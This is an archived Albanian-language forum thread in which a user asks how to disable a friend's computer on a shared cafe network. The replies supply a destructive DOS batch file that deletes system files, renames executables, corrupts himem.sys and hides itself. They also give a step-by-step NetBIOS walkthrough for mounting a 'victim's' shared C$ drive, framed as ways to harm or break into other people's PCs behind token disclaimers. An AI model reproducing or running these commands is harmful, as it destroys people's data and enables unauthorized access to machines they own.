PDA

View Full Version : A din dikush ?


enesi_21
03-04-04, 09:48
Pershendetje .

nese din dikush a ka mundesi me me tregu , nese jane disa kompjutera te lidhun ne nje rrjet si p.sh. net kafe si mundesh nga nje kompjuter permes DOS-it me ia nale kompjuterin shokut me qare komande ose naj menyre tjeter .

p.s.
ju flm per mirekuptim

BERLINERBOY
12-04-04, 17:02
°°° DOS eshte paraardhesi i sistemit operativ dhe eshte ne themelet e Windows, por mund te perdoret edhe kundra tij.


Sa here keni menduar:" Atij do ai percelloj PC!", por m.gj.t kur ka ardhur momenti nuk keni ditur nga t'ia filloni? Mire, Dos ju jep nje dore ne kete drejtim. N.q.s nuk dini te programoni, nuk perdorni viruse nga frika se mos infektoheni, Dos ben per ju.

°°° Fillimi°°°

Pothuajse te gjithe njohin filen e famshem AUTOEXEC.Bat, i pranishem ne cdo SO prodhim te Microsoft. Ky eshte shembull i nje file .BAT . Nje file i tille nuk eshte gje tjeter pervecse nje liste komandash dos qe Pc zbaton gjate ndezjes. me nje editor cfaredo ( perdorni Notepad! ), mund te modifikohet nje file BAT e pastaj te zbatoje komanda sipas deshires suaj. Kopjoni filen AUTOEXEC.BAT diku ne hard (mos ndryshoni asgje tek origjinali!). Hapeni pastaj me Notepad dhe do te shihni disa rreshta komanda. Beni EDIT-SELECT ALL pastaj DELETE dhe ja ku keni filen tuaj BAT per te edituar sipas deshires.
Dos nuk eshte shume i sigurt. Psh n.q.s procesin qe sapo kryem do perpiqeshim ta benim ne Windows, ky do te na lajmeronte dhe nuk do te lejonte procesin.Nderkohe qe ne Dos kjo nuk vlen. Ne filen tone BAT shkruajme:

-->del c:windowscommand.com

e ruajme dhe e rihapim, kjo komande do te egzekutohet dhe PC nuk do ndizet me ! Ky ishte nje shembull i thjeshte, por Dos mund te formatoje Hard, te kopjoje e te fshije te dhena.

°°°Komandat Kryesore°°°

Keto jane me kryesoret por po te keni deshire t'i shihni te gjitha jepni komanden
C:help
dhe do t'ju shfaqen te gjitha komandat e DiskOretatingSystem (DOS).

CD EmerDosje futesh ne dosje
MD EmerDosje krijon dosje
RD EmerDosje fshin dosje
DEL EmerFile fshin file
COPY EmerFile kopjon file ne nje file apo direktori tjeter
DIR shfaq file
DIR/p shfaq file ne disa faqe
RENAME ndryshon emrin e nje file
FORMAT EmerDisk formaton disk

Te futemi ne detaje...Tani do ju shpjegoj si behen ca gjera te tjera. Si fillim , cdo file duhet te nise me
-->@echo off
-->cd prova
do te shfaqet:
-->c:
-->c:prova
N.q.s nuk do i vija perpara @echo, do te shfaqej:
-->c:
-->c:cd prova
( komanda qe zbatova une!!)
-->c:prova
Pra n.q.s doni t'i fshini dikujt nje file te rendesishem dhe ky merr vesh ca nga DOS do te duhet me doemos te perdorni @echo off.
Ne menyre analoge kjo komande mund te sherbeje per te stampuar shkrime. P.sh une shkruaj:
-->echo PERSHENDETJE
ne file do te shfaqet PERSHENDETJE. Per te shfaqur nje rresht bosh, shkruani vetem:
-->echo.
Per te fshire nga file gjithcka te shkruar deri tani:
-->cls.

°°°Nuk Mbaron Me Kaq°°°

Ja komanda te tjera te rendesishme per t'u njohur:
Shume nga ju mund te kene pyetur veten se si modifikohen atributet e fileve. Komanda eshte ATTRIB dhe variantet jane:
+/- R akt/c'akt Read Only (vetem lexim)
+/- A akt/c'akt Archive (arkivim)
+/- S akt/c'akt System (lexime sistemi)
+/- H akt/c'akt Hidden (fshehje file)

P.sh une krijoj nje file te demshem per sistemin e viktimes dhe dus qe ky file te jete i padukshem dhe i pamodifikueshem.Shkruaj:

-->ATTRIB EmerFile.BAT +H +R.

Komanda COPY eshte shume e fuqishme dhe lejon operacuionet e meposhtme:

-->copy file.shtese c:emerdosje
do kopjoje file ne ate dosje.

-->copy file1.shtese+file2.shtese
zevendeson file2 me file1.

-->copy file1.shtese+file1.shtese c:emerdosje
kopjon filet ne dosje.

Komanda FIND gjen nje karakter apo nje fjale te caktuar ne nje file
-->find "PERSHENDETJE" file.shtese
kerkon fjalen PERSHENDETJE tek file.shtese

Komanda TYPE paraqet perberjen e nje file. Kjo komande mund te perdoret per te shfrytezuar nje defekt te Windows duke shkruar:
-->type XMSXXXX0 >c:windowshimem.sys
Ky file do te mbushet me karaktere te pakuptueshem dh do marre permasa te stermedha.

Ja nje shebull SHUME I DEMSHEM:

-->@echo off
-->del C:autoexec.bat
-->del C:config.sys
-->rename C:*.exe *.hacked
-->echo YOU have been hacked by EMRI_JUAJ
-->del C:windowswin.*
-->del C:windowssystem.ini
-->rename C:windows*.exe. C:windows*.hacked
-->del C:command.com
-->del C:windowscommand.com
-->type XMSXXXX0 >C:windowshimem.sys

Pc ku do zbatohet ky program do jape shpirt 37 sekonda pas ndezjes.

°°°Nje lutje e vogel°°°
Duke pare rrezikshmerine e procedures se mesiperme, ju lutem te mos perpiqeni te shkaktoni deme por ta konsideroni thjesht si nje stervitje interesante. :-) tash mbet i pershendetur nga une BERLINERBOY per tjera nevoja per hacking me kontakto mua te ndihmoj ne cdo interese qe keni zoteri

BERLINERBOY
12-04-04, 17:12
BERLINERBOY- Shkruan "Hacking me netbios eshte tashme nje nga metodat me klasike. M.gj.s tashme funksionon vetem me date 32 te cdo muaji (ha-ha), eshte legjende prandaj dua ta shpjegoj.

1.hapni nje dritare ne DOS (Start,Run,CMD)
shkruani C: nbtstat -A ip_viktimes

2.N.Q.S ju shfaqet Host Not Found nderroni adrese. Ne shfaqen ca rreshta te tjere , OK por s'eshte mjaftueshme.
Duhet te shihni rreshtin:
emri_pc_viktimeUNIQUE Registered.
XX do jete 20 kur te kete bere File Sharing.

3.Pas kesaj, gjithmone ne DOS jepni komanden C: edit lmhost
Ne faqen e shfaqur shkruani
ip_viktime pc_viktime #PRE
beni save dhe exit.

4.Ne dos jepni C:nbtstat -R dhe duhet te shfaqet: "Successful purge and preload of the NBT Remote Cache Name Table"

5.Jepni C: net view pc_viktime
eshte e rendesishme te kete bere file sharing(C,D,E) sepse ndryshe do merrni nje liste boshe!!!

6.Tani C: net use pc_viktimeX
ku X eshte dosja qe doni te shihni. P.sh per C duhet C$, per D D$ e keshtu me rradhe.

P.S Te gjitha informacionet ne tekniken e mesiperme jane me qellim teresisht informativ dhe autori (al_5f1nx) nuk mban asnje pergjegjesi per perdorimin e tyre

Mos beni tr**lleqe!" por vetem mesohuni

TONINO
21-09-04, 21:22
BERLINERBOY, pse bre djal ja paske perzi krejta, ti pse nuk i tregon me nje menyr mat shkurt qe ta kuptojn tė gjith por na tregon histori!!!

enesi_21 ndegjo pėrtja nalur dikuj PC ėshtė shum leht mendoj PC-jat qė ja ntė lidhura me njė rrejt por nuk me kujtohet komanda tash por dot shiqoj edhe tė tregoj por veq pak me kujtohet se PC ja nal dikuj me
*** shatdown***
Por ta tregoj njė komand tjeter qė dikuj tja shkruash njė flet world edhe tja qet nė ekranin e personit, kja ėshtė komanda. e hap ku eshte ne start exekute edhe e shkruan ** \\ numrin apo emrin e PC se personit\c$ edhe ja dergon
p.sh \\prat018\c$

Falm.. pėr mirkuptim..

_______________________________________

Geto_21